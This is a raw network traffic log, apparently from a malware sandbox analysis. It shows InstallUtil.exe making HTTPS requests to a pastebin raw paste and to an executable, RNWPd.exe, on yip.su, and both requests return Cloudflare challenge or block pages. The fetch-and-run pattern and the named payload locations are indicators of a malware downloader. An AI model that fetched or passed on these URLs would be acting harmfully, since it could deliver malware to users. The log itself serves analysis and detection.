2024-08-11 09:21:44 UTC	1369	IN	Data Raw: 33 62 65 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d Data Ascii: 3be7<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
2024-08-11 09:21:44 UTC	1369	IN	Data Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
2024-08-11 09:21:44 UTC	1369	IN	Data Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
2024-08-11 09:21:44 UTC	1369	IN	Data Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
2024-08-11 09:21:44 UTC	1369	IN	Data Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72 Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
2024-08-11 09:21:44 UTC	1369	IN	Data Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
2024-08-11 09:21:44 UTC	1369	IN	Data Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69 Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
2024-08-11 09:21:44 UTC	1369	IN	Data Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 69 70 2e 73 75 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 34 39 31 33 31 27 2c 63 52 61 79 3a 20 27 38 62 31 37 32 38 33 65 65 62 32 61 30 66 38 37 27 2c 63 48 61 73 68 3a 20 27 31 37 66 66 33 38 37 66 34 34 63 32 62 33 35 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 52 4e 57 50 64 2e 65 78 65 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 38 54 6f 47 52 35 39 4c 49 4d 5f 34 6e 67 62 32 31 62 54 77 78 52 70 63 37 66 54 41 39 63 30 5f 66 6f 4d 6a 6a 57 49 72 54 42 6f 2d 31 37 32 33 33 36 38 31 30 34 2d 30 2e 30 2e 31 2e 31 2d 33 36 30 34 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "yip.su",cType: 'managed',cNounce: '49131',cRay: '8b17283eeb2a0f87',cHash: '17ff387f44c2b35',cUPMDTk: "\/RNWPd.exe?__cf_chl_tk=8ToGR59LIM_4ngb21bTwxRpc7fTA9c0_foMjjWIrTBo-1723368104-0.0.1.1-3604",cFPWv: 'g',cTTim
2024-08-11 09:21:44 UTC	1369	IN	Data Raw: 51 38 6f 6a 35 41 5f 53 63 47 67 42 30 31 4a 39 55 73 6e 32 4d 65 71 78 73 72 6f 39 4e 49 64 39 66 69 70 7a 6b 74 77 42 42 61 50 49 31 72 57 62 4a 55 2e 68 4a 52 41 73 77 78 49 72 54 64 38 58 4a 71 4e 51 50 6b 66 36 35 43 76 50 58 4c 73 56 66 5a 6d 48 47 32 4c 30 53 36 44 2e 72 67 34 37 6b 53 4e 43 4d 37 77 6e 73 4c 50 6c 76 30 32 73 7a 54 69 69 57 4f 58 69 78 4c 54 6c 46 56 34 46 69 52 64 2e 59 58 68 6a 30 58 2e 62 50 7a 47 50 34 30 49 6d 48 79 53 56 67 4d 77 55 63 6a 41 38 35 70 6f 66 36 6a 7a 50 61 52 33 39 34 52 39 62 4d 53 30 75 50 68 5f 72 64 44 69 61 63 64 75 4d 33 44 6f 51 74 37 37 50 37 57 70 46 6e 5a 54 34 4a 52 52 67 45 4c 43 41 51 6a 61 65 53 55 69 43 78 52 4b 43 58 36 74 34 55 59 6a 59 71 49 6b 4f 54 55 57 6c 65 68 4c 5a 43 76 6a 68 4f 6a 51 Data Ascii: Q8oj5A_ScGgB01J9Usn2Meqxsro9NId9fipzktwBBaPI1rWbJU.hJRAswxIrTd8XJqNQPkf65CvPXLsVfZmHG2L0S6D.rg47kSNCM7wnsLPlv02szTiiWOXixLTlFV4FiRd.YXhj0X.bPzGP40ImHySVgMwUcjA85pof6jzPaR394R9bMS0uPh_rdDiacduM3DoQt77P7WpFnZT4JRRgELCAQjaeSUiCxRKCX6t4UYjYqIkOTUWlehLZCvjhOjQ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49711	172.67.19.24	443	7628	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-11 09:21:49 UTC	74	OUT	GET /raw/V6VJsrV3 HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-08-11 09:21:49 UTC	222	IN	HTTP/1.1 200 OK Date: Sun, 11 Aug 2024 09:21:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 8b17285d2cc00cac-EWR
2024-08-11 09:21:49 UTC	1147	IN	Data Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-11 09:21:49 UTC	1369	IN	Data Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
2024-08-11 09:21:49 UTC	1369	IN	Data Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
2024-08-11 09:21:49 UTC	529	IN	Data Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
2024-08-11 09:21:49 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49712	188.114.97.3	443	7628	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-11 09:21:50 UTC	65	OUT	GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive
2024-08-11 09:21:50 UTC	1285	IN	HTTP/1.1 403 Forbidden Date: Sun, 11 Aug 2024 09:21:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin Origin-Agent-Cluster: ?1 Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() Referrer-Policy: same-origin X-Content-Options: nosniff X-Frame-Options: SAMEORIGIN cf-mitigated: challenge
2024-08-11 09:21:50 UTC	683	IN	Data Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 44 61 41 79 69 4b 70 74 42 2b 49 4b 5a 71 5a 72 63 32 47 5a 6c 32 6e 61 55 70 6d 45 57 78 49 67 78 54 73 53 6c 6e 65 7a 70 36 41 6d 78 76 6f 44 41 7a 71 39 66 35 6b 61 76 34 35 71 6d 68 5a 65 41 44 69 64 75 35 50 4a 39 30 52 6e 43 2b 36 49 74 75 43 4d 41 50 4f 65 72 4c 65 4e 6d 50 67 62 73 72 4b 43 2f 69 46 57 2f 57 38 3d 24 71 71 4a 32 44 78 65 71 32 6b 57 75 48 54 68 62 46 56 45 54 53 77 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20 Data Ascii: cf-chl-out: DaAyiKptB+IKZqZrc2GZl2naUpmEWxIgxTsSlnezp6AmxvoDAzq9f5kav45qmhZeADidu5PJ90RnC+6ItuCMAPOerLeNmPgbsrKC/iFW/W8=$qqJ2Dxeq2kWuHThbFVETSw==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
2024-08-11 09:21:50 UTC	1369	IN	Data Raw: 33 62 66 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d Data Ascii: 3bfc<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
2024-08-11 09:21:50 UTC	1369	IN	Data Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
2024-08-11 09:21:50 UTC	1369	IN	Data Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
